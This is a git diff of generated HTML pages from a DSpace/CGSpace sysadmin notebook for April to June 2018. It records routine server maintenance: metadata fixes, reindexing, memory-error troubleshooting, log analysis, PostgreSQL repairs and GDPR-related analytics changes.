    -
    $ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
    -$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
    +$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
     
    • Afterwards I started a full Discovery reindexing on both CGSpace and DSpace Test
    • CGSpace took 76m28.292s
    • @@ -542,12 +542,12 @@ $ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.cont
    • DSpace Test crashed due to heap space so I’ve increased it from 4096m to 5120m
    • The error in Tomcat’s catalina.out was:
    -
    Exception in thread "RMI TCP Connection(idle)" java.lang.OutOfMemoryError: Java heap space
    +
    Exception in thread "RMI TCP Connection(idle)" java.lang.OutOfMemoryError: Java heap space
     
    • Add ISI Journal (cg.isijournal) as an option in Atmire’s Listing and Reports layout (#370) for Abenet
    • I noticed a few hundred CRPs using the old capitalized formatting so I corrected them:
    -
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
     Fixed 29 occurences of: CLIMATE CHANGE, AGRICULTURE AND FOOD SECURITY
     Fixed 7 occurences of: WATER, LAND AND ECOSYSTEMS
     Fixed 19 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
    diff --git a/docs/2018-04/index.html b/docs/2018-04/index.html
    index e51698b03..976f87793 100644
    --- a/docs/2018-04/index.html
    +++ b/docs/2018-04/index.html
    @@ -26,7 +26,7 @@ Catalina logs at least show some memory errors yesterday:
     I tried to test something on DSpace Test but noticed that it’s down since god knows when
     Catalina logs at least show some memory errors yesterday:
     "/>
    -
    +
     
     
         
    @@ -121,7 +121,7 @@ Catalina logs at least show some memory errors yesterday:
     SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]] 
     java.lang.OutOfMemoryError: Java heap space
     
    -Exception in thread "ContainerBackgroundProcessor[StandardEngine[Catalina]]" java.lang.OutOfMemoryError: Java heap space
    +Exception in thread "ContainerBackgroundProcessor[StandardEngine[Catalina]]" java.lang.OutOfMemoryError: Java heap space
     
    • So this is getting super annoying
    • I ran all system updates on DSpace Test and rebooted it
    • @@ -134,12 +134,12 @@ Exception in thread "ContainerBackgroundProcessor[StandardEngine[Catalina]]
    • Peter noticed that there were still some old CRP names on CGSpace, because I hadn’t forced the Discovery index to be updated after I fixed the others last week
    • For completeness I re-ran the CRP corrections on CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
     Fixed 1 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
     
    • Then started a full Discovery index:
    -
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
    +
    $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
     
     real    76m13.841s
    @@ -149,12 +149,12 @@ sys     2m2.498s
     
  • Elizabeth from CIAT emailed to ask if I could help her by adding ORCID identifiers to all of Joseph Tohme’s items
  • I used my add-orcid-identifiers-csv.py script:
  • -
    $ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
    +
    $ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
     
    • The CSV format of jtohme-2018-04-04.csv was:
    dc.contributor.author,cg.creator.id
    -"Tohme, Joseph M.",Joe Tohme: 0000-0003-2765-7101
    +"Tohme, Joseph M.",Joe Tohme: 0000-0003-2765-7101
     
    • There was a quoting error in my CRP CSV and the replacements for Forests, Trees and Agroforestry got messed up
    • So I fixed them and had to re-index again!
    • @@ -193,7 +193,7 @@ sys 2m52.585s
    • Help Peter with the GDPR compliance / reporting form for CGSpace
    • DSpace Test crashed due to memory issues again:
    -
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
    +
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
     16
     
    • I ran all system updates on DSpace Test and rebooted it
    • @@ -205,7 +205,7 @@ sys 2m52.585s
    • I got a notice that CGSpace CPU usage was very high this morning
    • Looking at the nginx logs, here are the top users today so far:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                   
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "10/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10                                                                                                   
         282 207.46.13.112
         286 54.175.208.220
         287 207.46.13.113
    @@ -220,24 +220,24 @@ sys     2m52.585s
     
  • 45.5.186.2 is of course CIAT
  • 95.108.181.88 appears to be Yandex:
  • -
    95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] "GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
    +
    95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] "GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1" 200 2638 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
     
    • And for some reason Yandex created a lot of Tomcat sessions today:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
     4363
     
    • 70.32.83.92 appears to be some harvester we’ve seen before, but on a new IP
    • They are not creating new Tomcat sessions so there is no problem there
    • 178.154.200.38 also appears to be Yandex, and is also creating many Tomcat sessions:
    -
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
    +
    $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
     3982
     
    • I’m not sure why Yandex creates so many Tomcat sessions, as its user agent should match the Crawler Session Manager valve
    • Let’s try a manual request with and without their user agent:
    -
    $ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
    +
    $ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
     GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
     Accept: */*
     Accept-Encoding: gzip, deflate
    @@ -294,7 +294,7 @@ X-XSS-Protection: 1; mode=block
     
    • In other news, it looks like the number of total requests processed by nginx in March went down from the previous months:
    -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2018"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2018"
     2266594
     
     real    0m13.658s
    @@ -305,23 +305,23 @@ sys     0m1.087s
     
     
    $ dspace cleanup -v
     ...
    -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    -  Detail: Key (bitstream_id)=(151626) is still referenced from table "bundle".
    +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
    +  Detail: Key (bitstream_id)=(151626) is still referenced from table "bundle".
     
    • The solution is, as always:
    -
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
    +
    $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
     UPDATE 1
     
    • Looking at abandoned connections in Tomcat:
    -
    # zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
    +
    # zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
     2115
     
    • Apparently from these stacktraces we should be able to see which code is not closing connections properly
    • Here’s a pretty good overview of days where we had database issues recently:
    -
    # zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
    +
    # zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
           1 Feb 18, 2018
           1 Feb 19, 2018
           1 Feb 20, 2018
    @@ -356,7 +356,7 @@ UPDATE 1
     
    • DSpace Test (linode19) crashed again some time since yesterday:
    -
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
    +
    # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
     168
     
    • I ran all system updates and rebooted the server
    • @@ -374,7 +374,7 @@ UPDATE 1
      • While testing an XMLUI patch for DS-3883 I noticed that there is still some remaining Authority / Solr configuration left that we need to remove:
      -
      2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check "solr.authority.server" property in the dspace.cfg
      +
      2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check "solr.authority.server" property in the dspace.cfg
       java.lang.NullPointerException
       
      • I assume we need to remove authority from the consumers in dspace/config/dspace.cfg:
      • @@ -422,14 +422,14 @@ webui.itemlist.sort-option.4 = type:dc.type:text
      • They are missing the order parameter (ASC vs DESC)
      • I notice that DSpace Test has crashed again, due to memory:
      -
      # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
      +
      # grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
       178
       
      • I will increase the JVM heap size from 5120M to 6144M, though we don’t have much room left to grow as DSpace Test (linode19) is using a smaller instance size than CGSpace
      • Gabriela from CIP asked if I could send her a list of all CIP authors so she can do some replacements on the name formats
      • I got a list of all the CIP collections manually and used the same query that I used in August, 2017:
      -
      dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
      +
      dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
       

      2018-04-19

      • Run updates on DSpace Test (linode19) and reboot the server
      • @@ -460,17 +460,17 @@ sys 2m2.687s
      • And there have been shit tons of errors in the last (starting only 20 minutes ago luckily):
      -
      # grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
      +
      # grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
       32147
       
      • I can’t even log into PostgreSQL as the postgres user, WTF?
      -
      $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c 
      +
      $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c 
       ^C
       
      • Here are the most active IPs today:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           917 207.46.13.182
           935 213.55.99.121
           970 40.77.167.134
      @@ -484,11 +484,11 @@ sys     2m2.687s
       
      • It doesn’t even seem like there is a lot of traffic compared to the previous days:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | wc -l
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "20/Apr/2018" | wc -l
       74931
      -# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E "19/Apr/2018" | wc -l
      +# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E "19/Apr/2018" | wc -l
       91073
      -# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E "18/Apr/2018" | wc -l
      +# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E "18/Apr/2018" | wc -l
       93459
       
      • I tried to restart Tomcat but systemctl hangs
      • @@ -543,7 +543,7 @@ org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Time
      • One other new thing I notice is that PostgreSQL 9.6 no longer uses createuser and nocreateuser, as those have actually meant superuser and nosuperuser and have been deprecated for ten years
      • So when I’m importing a CGSpace database dump I need to amend my notes to give a user superuser permission, rather than createuser:
      -
      $ psql dspacetest -c 'alter user dspacetest superuser;'
      +
      $ psql dspacetest -c 'alter user dspacetest superuser;'
       $ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-18.backup
       
      • There’s another issue with Tomcat in Ubuntu 18.04:
      • diff --git a/docs/2018-05/index.html b/docs/2018-05/index.html index 28955e429..3f7991480 100644 --- a/docs/2018-05/index.html +++ b/docs/2018-05/index.html @@ -38,7 +38,7 @@ http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E Then I reduced the JVM heap size from 6144 back to 5120m Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use "/> - + @@ -218,7 +218,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
      • I found some more IITA records that Sisay imported on 2018-03-23 that have invalid CRP names, so now I kinda want to check those ones!
      • Combine the ORCID identifiers Abenet sent with our existing list and resolve their names using the resolve-orcids.py script:
      -
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-05-06-combined.txt
      +
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2018-05-06-combined.txt
       $ ./resolve-orcids.py -i /tmp/2018-05-06-combined.txt -o /tmp/2018-05-06-combined-names.txt -d
       # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
       $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
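• The extraction half of that pipeline (grep -oE, sort, uniq) could be sketched in Python as follows. This is only an illustration, assuming the same loose pattern as the grep call; the function name extract_orcids and the sample strings are hypothetical, and the XML snippet is not the real layout of cg-creator-id.xml.

```python
import re

# Same pattern as the grep -oE call: four dash-separated groups of four characters
ORCID_PATTERN = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def extract_orcids(texts):
    """Return the sorted, de-duplicated identifiers found in the given strings."""
    found = set()
    for text in texts:
        found.update(ORCID_PATTERN.findall(text))
    return sorted(found)


# Hypothetical input mixing an XML-like line and plain text lines
sample = [
    '<node id="Robin Buruchara: 0000-0003-0934-1218"/>',
    "Andy Jarvis: 0000-0001-6543-0798",
    "Robin Buruchara: 0000-0003-0934-1218",
]
print(extract_orcids(sample))
```

The set takes the place of sort | uniq; the result can then be written one identifier per line for resolve-orcids.py.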
      @@ -242,12 +242,12 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
       
    • I could use it with reconcile-csv or to populate a Solr instance for reconciliation
    • This XPath expression gets close, but outputs all items on one line:
    -
    $ xmllint --xpath '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/node()' dspace/config/input-forms.xml        
    +
    $ xmllint --xpath '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/node()' dspace/config/input-forms.xml        
     Agriculture for Nutrition and HealthBig DataClimate Change, Agriculture and Food SecurityExcellence in BreedingFishForests, Trees and AgroforestryGenebanksGrain Legumes and Dryland CerealsLivestockMaizePolicies, Institutions and MarketsRiceRoots, Tubers and BananasWater, Land and EcosystemsWheatAquatic Agricultural SystemsDryland CerealsDryland SystemsGrain LegumesIntegrated Systems for the Humid TropicsLivestock and Fish
     
    • Maybe xmlstarlet is better:
    -
    $ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/text()' dspace/config/input-forms.xml
    +
    $ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name="crpsubject"]/pair/stored-value/text()' dspace/config/input-forms.xml
     Agriculture for Nutrition and Health
     Big Data
     Climate Change, Agriculture and Food Security
    @@ -313,12 +313,12 @@ Livestock and Fish
     
    import urllib2
     import re
     
    -pattern = re.compile('.*10.1016.*')
    +pattern = re.compile('.*10.1016.*')
     if pattern.match(value):
       get = urllib2.urlopen(value)
       return get.getcode()
     
    -return "blank"
    +return "blank"
     
    • I used a regex to limit it to just some of the DOIs in this case because there were thousands of URLs
    • Here the response code would be 200, 404, etc, or “blank” if there is no URL for that item
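• For reference, a rough Python 3 equivalent of that check outside of OpenRefine might look like the sketch below. It assumes the same regex; the function name check_url, the opener parameter (there so the function can be exercised without network access), and the 10 second timeout are my own additions and not part of the original snippet.

```python
import re
import urllib.error
import urllib.request

# Same regex as the OpenRefine snippet: only check values containing the 10.1016 prefix
PATTERN = re.compile(r".*10.1016.*")


def check_url(value, opener=urllib.request.urlopen):
    """Return the HTTP status code for value, or "blank" if there is nothing to check."""
    if not value or not PATTERN.match(value):
        return "blank"
    try:
        with opener(value, timeout=10) as response:
            return response.status
    except urllib.error.HTTPError as error:
        # urlopen raises for 4xx/5xx responses, but the status code is still available
        return error.code
```

Connection failures (urllib.error.URLError) are deliberately not caught here, so a DNS or network problem is not mistaken for an HTTP status.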
    • @@ -348,7 +348,7 @@ return "blank"
    $ ./bin/solr start
     $ ./bin/solr create_core -c countries
    -$ curl -X POST -H 'Content-type:application/json' --data-binary '{"add-field": {"name":"country", "type":"text_en", "multiValued":false, "stored":true}}' http://localhost:8983/solr/countries/schema
    +$ curl -X POST -H 'Content-type:application/json' --data-binary '{"add-field": {"name":"country", "type":"text_en", "multiValued":false, "stored":true}}' http://localhost:8983/solr/countries/schema
     $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
     
    • It still doesn’t catch simple mistakes like “ALBANI” or “AL BANIA” for “ALBANIA”, and it doesn’t return scores, so I have to select matches manually:
    • @@ -359,7 +359,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
    <defaultSearchField>search_text</defaultSearchField>
     ...
    -<copyField source="*" dest="search_text"/>
    +<copyField source="*" dest="search_text"/>
     
    • Actually, I wonder how much of their schema I could just copy…
    • Apparently the default search field is the df parameter and you could technically just add it to the query string, so no need to bother with that in the schema now
    • @@ -370,7 +370,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
      • Discuss GDPR with James Stapleton
          -
        • As far as I see it, we are “Data Controllers” on CGSpace because we store people's names, emails, and phone numbers if they register
        • +
        • As far as I see it, we are “Data Controllers” on CGSpace because we store people’s names, emails, and phone numbers if they register
        • We set cookies on the user’s computer, but these do not contain personally identifiable information (PII) and they are “session” cookies which are deleted when the user closes their browser
        • We use Google Analytics to track website usage, which makes Google the “Data Processor” and in this case we merely need to limit or obfuscate the information we send to them
        • As the only personally identifiable information we send is the user’s IP address, I think we only need to enable IP Address Anonymization in our analytics.js code snippets
        • @@ -381,8 +381,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
        • I created and merged a pull request to fix the sorting issue in Listings and Reports (#374)
        • Regarding the IP Address Anonymization for GDPR, I amended the Google Analytics snippet in page-structure-alterations.xsl to:
        -
        ga('send', 'pageview', {
        -  'anonymizeIp': true
        +
        ga('send', 'pageview', {
        +  'anonymizeIp': true
         });
         
        • I tested loading a certain page before and after adding this, and afterwards I saw that the parameter aip=1 was being sent with the analytics request to Google
        • @@ -439,7 +439,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
          • I’m investigating how many non-CGIAR users we have registered on CGSpace:
          -
          dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
          +
          dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
           
          • We might need to do something regarding these users for GDPR compliance because we have their names, emails, and potentially phone numbers
          • I decided that I will just use the cookieconsent script as is, since it looks good and technically does set the cookie with “allow” or “dismiss”
          • @@ -471,8 +471,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
          • I generated a list of CIFOR duplicates from the CIFOR_May_9 collection using the Atmire MQM module and then dumped the HTML source so I could process it for sending to Vika
          • I used grep to filter all relevant handle lines from the HTML source then used sed to insert a newline before each “Item1” line (as the duplicates are grouped like Item1, Item2, Item3 for each set of duplicates):
          -
          $ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html > ~/cifor-duplicates.txt
          -$ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cleaned.txt
          +
          $ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html > ~/cifor-duplicates.txt
          +$ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cleaned.txt
           
          • I told Vika to look through the list manually and indicate which ones are indeed duplicates that we should delete, and which ones to map to CIFOR’s collection
          • A few weeks ago Peter wanted a list of authors from the ILRI collections, so I need to find a way to get the handles of all those collections
          • @@ -486,7 +486,7 @@ $ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cle
          • Then I format the list of handles and put it into this SQL query to export authors from items ONLY in those collections (too many to list here):
          -
          dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
          +
          dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
           

          2018-05-31

          • Clarify CGSpace’s usage of Google Analytics and personally identifiable information during user registration for Bioversity team who had been asking about GDPR compliance
          • @@ -497,9 +497,9 @@ $ sed 's/.*Item1.*/\n&/g' ~/cifor-duplicates.txt > ~/cifor-duplicates-cle
          $ docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.5-alpine
           $ createuser -h localhost -U postgres --pwprompt dspacetest
           $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
          -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
          +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
           $ pg_restore -h localhost -O -U dspacetest -d dspacetest -W -h localhost ~/Downloads/cgspace_2018-05-30.backup
          -$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
          +$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
           $ psql -h localhost -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
           $ psql -h localhost -U postgres dspacetest
          diff --git a/docs/2018-06/index.html b/docs/2018-06/index.html index 8a2a6de9a..5f5621532 100644 --- a/docs/2018-06/index.html +++ b/docs/2018-06/index.html @@ -58,7 +58,7 @@ real 74m42.646s user 8m5.056s sys 2m7.289s "/> - + @@ -154,7 +154,7 @@ sys 2m7.289s
        • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
        • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
        -
        $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
        +
        $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
         
        • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
        • Time to index ~70,000 items on CGSpace:
        • @@ -181,7 +181,7 @@ sys 2m7.289s
        • Institut National des Recherches Agricoles du B nin
        • Centre de Coop ration Internationale en Recherche Agronomique pour le D veloppement
        • Institut des Recherches Agricoles du B nin
        • -
        • Institut des Savannes, C te d' Ivoire
        • +
        • Institut des Savannes, C te d’ Ivoire
        • Institut f r Pflanzenpathologie und Pflanzenschutz der Universit t, Germany
        • Projet de Gestion des Ressources Naturelles, B nin
        • Universit t Hannover
        • @@ -193,9 +193,9 @@ sys 2m7.289s
        • I uploaded fixes for all those now, but I will continue with the rest of the data later
        • Regarding the SQL migration errors, Atmire told me I need to run some migrations manually in PostgreSQL:
        -
        delete from schema_version where version = '5.6.2015.12.03.2';
        -update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
        -update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
        +
        delete from schema_version where version = '5.6.2015.12.03.2';
        +update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
        +update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
         
        • And then I need to ignore the ignored ones:
        @@ -205,7 +205,7 @@ update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015
      • Gabriela from CIP got back to me about the author names we were correcting on CGSpace
      • I did a quick sanity check on them and then did a test import with my fix-metadata-values.py script:
      -
      $ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
      +
      $ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
       
      • I will apply them on CGSpace tomorrow I think…
      @@ -221,7 +221,7 @@ update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015
    • After removing all code mentioning MQM, mqm, metadata-quality, batchedit, duplicatechecker, etc, I think I got most of it removed, but there is a Spring error during Tomcat startup:
     INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
    -Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
